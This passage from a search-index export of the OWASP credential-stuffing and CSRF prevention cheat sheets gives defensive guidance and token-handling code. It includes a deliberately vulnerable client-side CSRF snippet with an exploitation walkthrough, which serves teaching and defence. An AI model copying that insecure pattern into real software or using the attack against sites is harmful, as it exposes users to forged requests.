Requiring a user to solve a CAPTCHA for each login attempt can help to prevent automated login attempts, which would significantly slow down a credential stuffing or password spraying attack. However, CAPTCHAs are not perfect, and in many cases tools exist that can be used to break them with a reasonably high success rate.

To improve usability, it may be desirable to only require the user solve a CAPTCHA when the login request is considered suspicious, using the same criteria discussed above.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#ip-block-listing","title":"IP Block-listing","text":"

Less sophisticated attacks will often use a relatively small number of IP addresses, which can be block-listed after a number of failed login attempts. These failures should be tracked separately to the per-user failures, which are intended to protect against brute-force attacks. The block list should be temporary, in order to reduce the likelihood of permanently blocking legitimate users.

Additionally, there are publicly available block lists of known bad IP addresses which are collected by websites such as AbuseIPDB based on abuse reports from users.

Consider storing the last IP address which successfully logged in to each account, and if this IP address is added to a block list, then taking appropriate action such as locking the account and notifying the user, as it likely that their account has been compromised.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#device-fingerprinting","title":"Device Fingerprinting","text":"

Aside from the IP address, there are a number of different factors that can be used to attempt to fingerprint a device. Some of these can be obtained passively by the server from the HTTP headers (particularly the \"User-Agent\" header), including:

Using JavaScript it is possible to access far more information, such as:

Using these various attributes, it is possible to create a fingerprint of the device. This fingerprint can then be matched against any browser attempting to login to the account, and if it doesn't match then the user can be prompted for additional authentication. Many users will have multiple devices or browsers that they use, so it is not practical to block attempts that do not match the existing fingerprints.

The fingerprintjs2 JavaScript library can be used to carry out client-side fingerprinting.

It should be noted that as all this information is provided by the client, it can potentially be spoofed by an attacker. In some cases spoofing these attributes is trivial (such as the \"User-Agent\") header, but in other cases it may be more difficult to modify these attributes.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#require-unpredictable-usernames","title":"Require Unpredictable Usernames","text":"

Credential stuffing attacks rely on not just the re-use of passwords between multiple sites, but also the re-use of usernames. A significant number of websites use the email address as the username, and as most users will have a single email address they use for all their accounts, this makes the combination of an email address and password very effective for credential stuffing attacks.

Requiring users to create their own username when registering on the website makes it harder for an attacker to obtain valid username and password pairs for credential stuffing, as many of the available credential lists only include email addresses. Providing the user with a generated username can provide a higher degree of protection (as users are likely to choose the same username on most websites), but is user unfriendly. Additionally, care needs to be taken to ensure that the generated username is not predictable (such as being based on the user's full name, or sequential numeric IDs), as this could make enumerating valid usernames for a password spraying attack easier.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#defense-in-depth","title":"Defense in Depth","text":"

The following mechanisms are not sufficient to prevent credential stuffing or password spraying attacks; however they can be used to make the attacks more time consuming or technically difficult to implement. This can be useful to defend against opportunistic attackers, who use off-the-shelf tools and are likely to be discouraged by any technical barriers, but will not be sufficient against a more targeted attack.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#multi-step-login-processes","title":"Multi-Step Login Processes","text":"

The majority of off-the-shelf tools are designed for a single step login process, where the credentials are POSTed to the server, and the response indicates whether or not the login attempt was successful. By adding additional steps to this process, such as requiring the username and password to be entered sequentially, or requiring that the user first obtains a random CSRF Token before they can login, this makes the attack slightly more difficult to perform, and doubles the number of requests that the attacker must make.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#require-javascript-and-block-headless-browsers","title":"Require JavaScript and Block Headless Browsers","text":"

Most tools used for these types of attacks will make direct POST requests to the server and read the responses, but will not download or execute JavaScript that was contained in them. By requiring the attacker to evaluate JavaScript in the response (for example to generate a valid token that must be submitted with the request), this forces the attacker to either use a real browser with an automation framework like Selenium or Headless Chrome, or to implement JavaScript parsing with another tool such as PhantomJS. Additionally, there are a number of techniques that can be used to identify Headless Chrome or PhantomJS.

Please note that blocking visitors who have JavaScript disabled will reduce the accessibility of the website, especially to visitors who use screen readers. In certain jurisdictions this may be in breach of equalities legislation.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#identifying-leaked-passwords","title":"Identifying Leaked Passwords","text":"

When a user sets a new password on the application, as well as checking it against a list of known weak passwords, it can also be checked against passwords that have previously been breached. The most well known public service for this is Pwned Passwords. You can host a copy of the application yourself, or use the API.

In order to protect the value of the source password being searched for, Pwned Passwords implements a k-Anonymity model that allows a password to be searched for by partial hash. This allows the first 5 characters of a SHA-1 password hash to be passed to the API.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#notify-users-about-unusual-security-events","title":"Notify users about unusual security events","text":"

When suspicious or unusual activity is detected, it may be appropriate to notify or warn the user. However, care should be taken that the user does not get overwhelmed with a large number of notifications that are not important to them, or they will just start to ignore or delete them.

For example, it would generally not be appropriate to notify a user that there had been an attempt to login to their account with an incorrect password. However, if there had been a login with the correct password, but which had then failed the subsequent MFA check, the user should be notified so that they can change their password.

Details related to current or recent logins should also be made visible to the user. For example, when they login to the application, the date, time and location of their previous login attempt could be displayed to them. Additionally, if the application supports concurrent sessions, the user should be able to view a list of all active sessions, and to terminate any other sessions that are not legitimate.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html","title":"Cross-Site Request Forgery Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Cross-Site Request Forgery (CSRF)\u00a0is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site when the user is authenticated. A CSRF attack works because browser requests automatically include all cookies including session cookies. Therefore, if the user is authenticated to the site, the site cannot distinguish between legitimate authorized requests and forged authenticated requests. This attack is thwarted when proper Authorization is used, which implies that a challenge-response mechanism is required that verifies the identity and authority of the requester.

The impact of a successful CSRF attack is limited to the capabilities exposed by the vulnerable application and privileges of the user. For example, this attack could result in a transfer of funds, changing a password, or making a purchase with the user's credentials. In effect, CSRF attacks are used by an attacker to make a target system perform a function via the victim's browser, without the victim's knowledge, at least until the unauthorized transaction has been committed.

In short, the following principles should be followed to defend against CSRF:

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#token-based-mitigation","title":"Token Based Mitigation","text":"

The synchronizer token pattern is one of the most popular and recommended methods to mitigate CSRF.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#use-built-in-or-existing-csrf-implementations-for-csrf-protection","title":"Use Built-In Or Existing CSRF Implementations for CSRF Protection","text":"

Synchronizer token defenses have been built into many frameworks. It is strongly recommended to research if the framework you are using has an option to achieve CSRF protection by default before trying to build your custom token generating system. For example, .NET has built-in protection that adds a token to CSRF vulnerable resources. You are responsible for proper configuration (such as key management and token management) before using these built-in CSRF protections that generate tokens to guard CSRF vulnerable resources.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#synchronizer-token-pattern","title":"Synchronizer Token Pattern","text":"

CSRF tokens should be generated on the server-side. They can be generated once per user session or for each request. Per-request tokens are more secure than per-session tokens as the time range for an attacker to exploit the stolen tokens is minimal. However, this may result in usability concerns. For example, the \"Back\" button browser capability is often hindered as the previous page may contain a token that is no longer valid. Interaction with this previous page will result in a CSRF false positive security event on the server. In per-session token implementations after the initial generation of a token, the value is stored in the session and is used for each subsequent request until the session expires.

When a request is issued by the client, the server-side component must verify the existence and validity of the token in the request compared to the token found in the user session. If the token was not found within the request, or the value provided does not match the value within the user session, then the request should be rejected. Additional actions such as logging the event as a potential CSRF attack in progress should also be considered.

CSRF tokens should be:

CSRF tokens prevent CSRF because without a token, an attacker cannot create valid requests to the backend server.

For the Synchronised Token Pattern, CSRF tokens should not be transmitted using cookies.

The CSRF token can be transmitted to the client as part of a response payload, such as a HTML or JSON response. It can then be transmitted back to the server as a hidden field on a form submission, or via an AJAX request as a custom header value or part of a JSON payload. Make sure that the token is not leaked in the server logs, or in the URL. CSRF tokens in GET requests are potentially leaked at several locations, such as the browser history, log files, network utilities that log the first line of a HTTP request, and Referer headers if the protected site links to an external site.

For example:

<form action=\"/transfer.do\" method=\"post\">\n<input type=\"hidden\" name=\"CSRFToken\" value=\"OWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTVhM2JmNGYxYjJiMGI4MjJjZDE1ZDZMGYwMGEwOA==\">\n[...]\n</form>\n

Inserting the CSRF token in a custom HTTP request header via JavaScript is considered more secure than adding the token in the hidden field form parameter because requests with custom headers are automatically subject to the same-origin policy.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#double-submit-cookie","title":"Double Submit Cookie","text":"

If maintaining the state for CSRF token on the server is problematic, you can use an alternative technique known as the Double Submit Cookie pattern. This technique is easy to implement and is stateless. There are different ways to implement this technique, where the naive pattern is the most commonly used variation.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#naive-double-submit-cookie","title":"Naive Double Submit Cookie","text":"

The Naive Double Submit Cookie is a scalable and easy-to-implement technique where we send a random value in both a cookie and as a request parameter, with the server verifying if the cookie value and request value match. When a user visits (even before authenticating to prevent login CSRF), the site should generate a (ideally cryptographically strong) random value and set it as a cookie on the user's machine separate from the session identifier. The site then requires that every transaction request includes this random value as a hidden form value, or in the request header. If both of them match at server side, the server accepts it as legitimate request and if they don't, it would reject the request.

In a nutshell, an attacker is unable to access the cookie value during a cross-site request. This prevents them from including a matching value in the hidden form value or as a request parameter/header.

The Naive Double Submit Cookie method is a good initial step to counter CSRF attacks, but it remains vulnerable to certain attacks. This resource provides more information on some vulnerabilities. It is therefore recommended to use a more secure implementation, the Signed Double Submit Cookie pattern.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#signed-double-submit-cookie","title":"Signed Double Submit Cookie","text":"

The Signed Double Submit Cookie involves a secret key known only to the server. This ensures that an attacker cannot create and inject their own, known, CSRF token into the victim's authenticated session. Tokens can be secured by hashing or encrypting them, with HMAC algorithm being a popular choice due to its fast speed and easy implementation.

In both cases, it is recommended to bind the CSRF token with the users current session to even further enhance security.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#hmac-csrf-token","title":"HMAC CSRF Token","text":"

A simpler alternative to an encrypted CSRF cookie is to use HMAC (Hash-based Message Authentication Code) to hash the random value with a secret key known only by the server and place this value in a cookie. This is similar to an encrypted cookie (both require knowledge only the server holds), but is less computationally intensive than encrypting and decrypting the cookie.

We recommend generating the HMAC CSRF Token, with a session-dependent user value, using the following steps:

Below is an example in pseudo-code that demonstrates the implementation steps described above:

// Gather the values\nsecret = readEnvironmentVariable(\"CSRF_SECRET\") // HMAC secret key\nsessionID = session.sessionID // Current authenticated user session\nrandomValue = cryptographic.randomValue() // Cryptographic random value\n\n// Create the CSRF Token\nmessage = sessionID + \"!\" + randomValue // HMAC message payload\nhmac = hmac(\"SHA256\", secret, message) // Generate the HMAC hash\ncsrfToken = hmac + \".\" + message // Combine HMAC hash with message to generate the token. The plain message is required to later authenticate it against its HMAC hash\n\n// Store the CSRF Token in a cookie\nresponse.setCookie(\"csrf_token=\" + csrfToken + \"; Secure) // Set Cookie without HttpOnly flag\n

Should Timestamps be Included in CSRF Tokens for Expiration? It's a common misconception to include timestamps as a value to specify the CSRF token expiration time. A CSRF Token is not an access token. They are used to verify the authenticity of requests throughout a session, using session information. A new session should generate a new token (1).

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#custom-request-headers","title":"Custom Request Headers","text":"

Both the synchronizer token and the double submit cookie are used to prevent forgery of form data, but they can be tricky to implement and degrade usability. Many modern web applications do not use <form> tags. A user-friendly defense that is particularly well suited for AJAX or API endpoints is the use of a custom request header. No token is needed for this approach.

In this pattern, the client appends a custom header to requests that require CSRF protection. The header can be any arbitrary key-value pair, as long as it does not conflict with existing headers.

X-YOURSITE-CSRF-PROTECTION=1\n

When handling the request, the API checks for the existence of this header. If the header does not exist, the backend rejects the request as potential forgery. This approach has several advantages:

If you use <form> tags anywhere in your client, you will still need to protect them with alternate approaches described in this document such as tokens.

This defense relies on the browser's same-origin policy (SOP) restriction that only JavaScript can be used to add a custom header, and only within its origin. By default, browsers do not allow JavaScript to make cross origin requests with custom headers. Only JavaScript that you serve from your origin can add these headers.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#custom-headers-and-cors","title":"Custom Headers and CORS","text":"

Cookies are not set on cross-origin requests (CORS) by default. To enable cookies on an API, you will set Access-Control-Allow-Credentials=true. The browser will reject any response that includes Access-Control-Allow-Origin=* if credentials are allowed. To allow CORS requests, but protect against CSRF, you need to make sure the server only whitelists a few select origins that you definitively control via the Access-Control-Allow-Origin header. Any cross-origin request from an allowed domain will be able to set custom headers.

As an example, you might configure your backend to allow CORS with cookies from http://www.yoursite.com and http://mobile.yoursite.com, so that the only possible preflight responses are:

Access-Control-Allow-Origin=http://mobile.yoursite.com\nAccess-Control-Allow-Credentials=true\n

or

Access-Control-Allow-Origin=http://www.yoursite.com\nAccess-Control-Allow-Credentials=true\n

A less secure configuration would be to configure your backend server to allow CORS from all subdomains of your site using a regular expression. If an attacker is able to take over a subdomain (not uncommon with cloud services) your CORS configuration would allow them to bypass the same origin policy and forge a request with your custom header.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#defense-in-depth-techniques","title":"Defense In Depth Techniques","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#samesite-cookie-attribute","title":"SameSite Cookie Attribute","text":"

SameSite is a cookie attribute (similar to HTTPOnly, Secure etc.) which aims to mitigate CSRF attacks. It is defined in RFC6265bis. This attribute helps the browser decide whether to send cookies along with cross-site requests. Possible values for this attribute are Lax, Strict, or None.

The Strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link. For example, for a GitHub-like website this would mean that if a logged-in user follows a link to a private GitHub project posted on a corporate discussion forum or email, GitHub will not receive the session cookie and the user will not be able to access the project. A bank website however doesn't want to allow any transactional pages to be linked from external sites, so the Strict flag would be most appropriate.

The default Lax value provides a reasonable balance between security and usability for websites that want to maintain user's logged-in session after the user arrives from an external link. In the above GitHub scenario, the session cookie would be allowed when following a regular link from an external website while blocking it in CSRF-prone request methods such as POST. Only cross-site-requests that are allowed in Lax mode are the ones that have top-level navigations and are also safe HTTP methods.

For more details on the SameSite values, check the following section from the rfc.

Example of cookies using this attribute:

Set-Cookie: JSESSIONID=xxxxx; SameSite=Strict\nSet-Cookie: JSESSIONID=xxxxx; SameSite=Lax\n

All desktop browsers and almost all mobile browsers now support the SameSite attribute. To keep track of the browsers implementing it and the usage of the attribute, refer to the following service. Note that Chrome has announced that they will mark cookies as SameSite=Lax by default from Chrome 80 (due in February 2020), and Firefox and Edge are both planning to follow suit. Additionally, the Secure flag will be required for cookies that are marked as SameSite=None.

It is important to note that this attribute should be implemented as an additional layer defense in depth concept. This attribute protects the user through the browsers supporting it, and it contains as well 2 ways to bypass it as mentioned in the following section. This attribute should not replace having a CSRF Token. Instead, it should co-exist with that token in order to protect the user in a more robust way.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#verifying-origin-with-standard-headers","title":"Verifying Origin With Standard Headers","text":"

There are two steps to this mitigation, both of which rely on examining an HTTP request header value.

  1. Determining the origin the request is coming from (source origin). Can be done via Origin or Referer headers.
  2. Determining the origin the request is going to (target origin).

At server side we verify if both of them match. If they do, we accept the request as legitimate (meaning it's the same origin request) and if they don't, we discard the request (meaning that the request originated from cross-domain). Reliability on these headers comes from the fact that they cannot be altered programmatically as they fall under forbidden headers list, meaning that only the browser can set them.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#identifying-source-origin-via-originreferer-header","title":"Identifying Source Origin (via Origin/Referer header)","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#checking-the-origin-header","title":"Checking the Origin Header","text":"

If the Origin header is present, verify that its value matches the target origin. Unlike the Referer, the Origin header will be present in HTTP requests that originate from an HTTPS URL.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#checking-the-referer-header","title":"Checking the Referer Header","text":"

If the Origin header is not present, verify the hostname in the Referer header matches the target origin. This method of CSRF mitigation is also commonly used with unauthenticated requests, such as requests made prior to establishing a session state, which is required to keep track of a synchronization token.

In both cases, make sure the target origin check is strong. For example, if your site is example.org make sure example.org.attacker.com does not pass your origin check (i.e, match through the trailing / after the origin to make sure you are matching against the entire origin).

If neither of these headers are present, you can either accept or block the request. We recommend blocking. Alternatively, you might want to log all such instances, monitor their use cases/behavior, and then start blocking requests only after you get enough confidence.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#identifying-the-target-origin","title":"Identifying the Target Origin","text":"

You might think it's easy to determine the target origin, but it's frequently not. The first thought is to simply grab the target origin (i.e., its hostname and port #) from the URL in the request. However, the application server is frequently sitting behind one or more proxies and the original URL is different from the URL the app server actually receives. If your application server is directly accessed by its users, then using the origin in the URL is fine and you're all set.

If you are behind a proxy, there are a number of options to consider.

This mitigation is working properly when origin or referrer headers are present in the requests. Though these headers are included majority of the time, there are few use cases where they are not included (most of them are for legitimate reasons to safeguard users privacy/to tune to browsers ecosystem). The following lists some use cases:

Usually, a minor percentage of traffic does fall under above categories (1-2%) and no enterprise would want to lose this traffic. One of the popular technique used across the Internet to make this technique more usable is to accept the request if the Origin/referrer matches your configured list of domains \"OR\" a null value (Examples here. The null value is to cover the edge cases mentioned above where these headers are not sent). Please note that, attackers can exploit this but people prefer to use this technique as a defense in depth measure because of the minor effort involved in deploying it.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#cookie-with-__host-prefix","title":"Cookie with __Host- prefix","text":"

Another solution for this problem is use of Cookie Prefixes for cookie with CSRF token. If cookie has __Host- prefix e.g. Set-Cookie: __Host-token=RANDOM; path=/; Secure then the cookie:

As of July 2020 cookie prefixes are supported by all major browsers except Internet Explorer.

See the Mozilla Developer Network and IETF Draft for further information about cookie prefixes.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#user-interaction-based-csrf-defense","title":"User Interaction Based CSRF Defense","text":"

While all the techniques referenced here do not require any user interaction, sometimes it's easier or more appropriate to involve the user in the transaction to prevent unauthorized operations (forged via CSRF or otherwise). The following are some examples of techniques that can act as strong CSRF defense when implemented correctly.

While these are a very strong CSRF defense, it can create a significant impact on the user experience. As such, they would generally only be used for security critical operations (such as password change, money transfers, etc.), alongside the other defences discussed in this cheat sheet.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#login-csrf","title":"Login CSRF","text":"

Most developers tend to ignore CSRF vulnerability on login forms as they assume that CSRF would not be applicable on login forms because user is not authenticated at that stage, however this assumption is not always true. CSRF vulnerabilities can still occur on login forms where the user is not authenticated, but the impact and risk is different.

For example, if an attacker uses CSRF to assume an authenticated identity of a target victim on a shopping website using the attacker's account, and the victim then enters their credit card information, an attacker may be able to purchase items using the victim's stored card details. For more information about login CSRF and other risks, see section 3 of this paper.

Login CSRF can be mitigated by creating pre-sessions (sessions before a user is authenticated) and including tokens in login form. You can use any of the techniques mentioned above to generate tokens. Remember that pre-sessions cannot be transitioned to real sessions once the user is authenticated - the session should be destroyed and a new one should be made to avoid session fixation attacks. This technique is described in Robust Defenses for Cross-Site Request Forgery section 4.1.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf","title":"Client-side CSRF","text":"

Client-side CSRF is a new variant of CSRF attacks where the attacker tricks the client-side JavaScript code to send a forged HTTP request to a vulnerable target site by manipulating the program\u2019s input parameters. Client-side CSRF originates when the JavaScript program uses attacker-controlled inputs, such as the URL, for the generation of asynchronous HTTP requests.

Note: These variants of CSRF are particularly important as they can bypass some of the common anti-CSRF countermeasures like token-based mitigations and SameSite cookies. For example, when synchronizer tokens or custom HTTP request headers are used, the JavaScript program will include them in the asynchronous requests. Also, web browsers will include cookies in same-site request contexts initiated by JavaScript programs, circumventing the SameSite cookie policies.

Client-side vs. Classical CSRF: In the classical CSRF, the vulnerable component is the server-side program, which cannot distinguish whether the incoming authenticated request was performed intentionally, also known as the confused deputy problem. In the client-side CSRF, the vulnerable component is the client-side JavaScript program instead, which allows an attacker to generate arbitrary asynchronous requests, e.g., by manipulating the request endpoint and/or its parameters. Client-side CSRF is an input validation problem, that when exploited, reintroduces the confused deputy flaw, that is, the server-side won't, again, be able to distinguish if the request was performed intentionally or not.

For more information about client-side CSRF vulnerabilities, see Sections 2 and 5 of this paper, the CSRF chapter of the SameSite wiki, and this post by the Facebook Whitehat program.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf-example","title":"Client-side CSRF Example","text":"

The following code snippet demonstrates a simple example of a client-side CSRF vulnerability.

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\nfunction ajaxLoad(){\n// process the URL hash fragment\nlet hash_fragment = window.location.hash.slice(1);  // hash fragment should be of the format: /^(get|post);(.*)$/\n// e.g., https://site.com/index/#post;/profile\nif(hash_fragment.length > 0 && hash_fragment.indexOf(';') > 0 ){\n\nlet params = hash_fragment.match(/^(get|post);(.*)$/);\nif(params && params.length){\nlet request_method = params[1];   let request_endpoint = params[3];\n\nfetch(request_endpoint, {\nmethod: request_method,\nheaders: {\n'XSRF-TOKEN': csrf_token,\n// [...]\n},\n// [...]\n}).then(response => { /* [...] */ }); }\n}\n}\n// trigger the async request on page load\nwindow.onload = ajaxLoad();\n</script>\n

Vulnerability: In this snippet, the program invokes a function ajaxLoad() upon the page load, which is responsible for loading various webpage elements. The function reads the value of the URL hash fragment (line 4), and extracts two pieces of information from it (i.e., request method and endpoint) to generate an asynchronous HTTP request (lines 11-13). The vulnerability occurs in lines 15-22, when the JavaScript program uses URL fragments to obtain the server-side endpoint for the asynchronous HTTP request (line 15) and the request method. However, both inputs can be controlled by web attackers, who can pick the value of their choosing, and craft a malicious URL containing the attack payload.

Attack: For exploitation, attackers can share the malicious URL with the victim (e.g., spear-phishing emails) and convince them to click on it, because such URL belongs to the origin of an honest, reputable but vulnerable website. Alternatively, they can use it as a part of an attack page they control and abuse browser APIs (e.g., the window.open() API) to trick the vulnerable JavaScript of the target page to send the HTTP request, which closely resemles the attack model of the classical CSRF attacks.

For more examples of client-side CSRF, see this post by the Facebook Whitehat program and this USENIX Security paper.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf-mitigation-techniques","title":"Client-side CSRF Mitigation Techniques","text":"

Independent Requests: Client-side CSRF can be prevented if asynchronous requests are not generated via attacker controllable inputs, such as the URL, window name, document referrer, and postMessages, to name only a few examples.

Input Validation: Achieving complete isolaion between inputs and request parameters may not always be possible depending on the context and functionality. In these cases, input validation checks has to be implemented. These checks should strictly assess the format and choice of the values of the request parameters and decide whether they can only be used in non-state-changing operations (e.g., only allow GET requests and endpoints starting with a predefined prefix).

Predefined Request Data: Another mitigation technique is to store a list of predefined, safe request data in the JavaScript code (e.g., combinations of endpoints, request methods and other parameters that are safe to be replayed). The program can then use a switch parameter in the URL fragment to decide which entry of the list should each JavaScript function use.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#java-reference-example","title":"Java Reference Example","text":"

The following JEE web filter provides an example reference for some of the concepts described in this cheatsheet. It implements the following stateless mitigations (OWASP CSRFGuard, cover a stateful approach).

Please note that it only acts a reference sample and is not complete (for example: it doesn't have a block to direct the control flow when origin and referrer header check succeeds nor it has a port/host/protocol level validation for referrer header). Developers are recommended to build their complete mitigation on top of this reference sample. Developers should also implement authentication and authorization mechanisms before checking for CSRF is considered effective.

Full source is located here and provides a runnable POC.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#javascript-guidance-for-auto-inclusion-of-csrf-tokens-as-an-ajax-request-header","title":"JavaScript Guidance for Auto-inclusion of CSRF tokens as an AJAX Request header","text":"

The following guidance considers GET, HEAD and OPTIONS methods are safe operations. Therefore GET, HEAD, and OPTIONS method AJAX calls need not be appended with a CSRF token header. However, if the verbs are used to perform state changing operations, they will also require a CSRF token header (although this is bad practice, and should be avoided).

The POST, PUT, PATCH, and DELETE methods, being state changing verbs, should have a CSRF token attached to the request. The following guidance will demonstrate how to create overrides in JavaScript libraries to have CSRF tokens included automatically with every AJAX request for the state changing methods mentioned above.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#storing-the-csrf-token-value-in-the-dom","title":"Storing the CSRF Token Value in the DOM","text":"

A CSRF token can be included in the <meta> tag as shown below. All subsequent calls in the page can extract the CSRF token from this <meta> tag. It can also be stored in a JavaScript variable or anywhere on the DOM. However, it is not recommended to store it in cookies or browser local storage.

The following code snippet can be used to include a CSRF token as a <meta> tag:

<meta name=\"csrf-token\" content=\"{{ csrf_token() }}\">\n

The exact syntax of populating the content attribute would depend on your web application's backend programming language.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#overriding-defaults-to-set-custom-header","title":"Overriding Defaults to Set Custom Header","text":"

Several JavaScript libraries allow for overriding default settings to have a header added automatically to all AJAX requests.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#xmlhttprequest-native-javascript","title":"XMLHttpRequest (Native JavaScript)","text":"

XMLHttpRequest's open() method can be overridden to set the anti-csrf-token header whenever the open() method is invoked next. The function csrfSafeMethod() defined below will filter out the safe HTTP methods and only add the header to unsafe HTTP methods.

This can be done as demonstrated in the following code snippet:

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\nfunction csrfSafeMethod(method) {\n// these HTTP methods do not require CSRF protection\nreturn (/^(GET|HEAD|OPTIONS)$/.test(method));\n}\nvar o = XMLHttpRequest.prototype.open;\nXMLHttpRequest.prototype.open = function(){\nvar res = o.apply(this, arguments);\nvar err = new Error();\nif (!csrfSafeMethod(arguments[0])) {\nthis.setRequestHeader('anti-csrf-token', csrf_token);\n}\nreturn res;\n};\n</script>\n
"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#angularjs","title":"AngularJS","text":"

AngularJS allows for setting default headers for HTTP operations. Further documentation can be found at AngularJS's documentation for $httpProvider.

<script>\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\n\nvar app = angular.module(\"app\", []);\n\napp.config(['$httpProvider', function ($httpProvider) {\n$httpProvider.defaults.headers.post[\"anti-csrf-token\"] = csrf_token;\n$httpProvider.defaults.headers.put[\"anti-csrf-token\"] = csrf_token;\n$httpProvider.defaults.headers.patch[\"anti-csrf-token\"] = csrf_token;\n// AngularJS does not create an object for DELETE and TRACE methods by default, and has to be manually created.\n$httpProvider.defaults.headers.delete = {\n\"Content-Type\" : \"application/json;charset=utf-8\",\n\"anti-csrf-token\" : csrf_token\n};\n$httpProvider.defaults.headers.trace = {\n\"Content-Type\" : \"application/json;charset=utf-8\",\n\"anti-csrf-token\" : csrf_token\n};\n}]);\n</script>\n

This code snippet has been tested with AngularJS version 1.7.7.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#axios","title":"Axios","text":"

Axios allows us to set default headers for the POST, PUT, DELETE and PATCH actions.

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\n\naxios.defaults.headers.post['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.put['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.delete['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.patch['anti-csrf-token'] = csrf_token;\n\n// Axios does not create an object for TRACE method by default, and has to be created manually.\naxios.defaults.headers.trace = {}\naxios.defaults.headers.trace['anti-csrf-token'] = csrf_token\n</script>\n

This code snippet has been tested with Axios version 0.18.0.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#jquery","title":"JQuery","text":"

JQuery exposes an API called $.ajaxSetup() which can be used to add the anti-csrf-token header to the AJAX request. API documentation for $.ajaxSetup() can be found here. The function csrfSafeMethod() defined below will filter out the safe HTTP methods and only add the header to unsafe HTTP methods.

You can configure jQuery to automatically add the token to all request headers by adopting the following code snippet. This provides a simple and convenient CSRF protection for your AJAX based applications:

<script type=\"text/javascript\">\nvar csrf_token = $('meta[name=\"csrf-token\"]').attr('content');\n\nfunction csrfSafeMethod(method) {\n// these HTTP methods do not require CSRF protection\nreturn (/^(GET|HEAD|OPTIONS)$/.test(method));\n}\n\n$.ajaxSetup({\nbeforeSend: function(xhr, settings) {\nif (!csrfSafeMethod(settings.type) && !this.crossDomain) {\nxhr.setRequestHeader(\"anti-csrf-token\", csrf_token);\n}\n}\n});\n</script>\n

This code snippet has been tested with jQuery version 3.3.1.

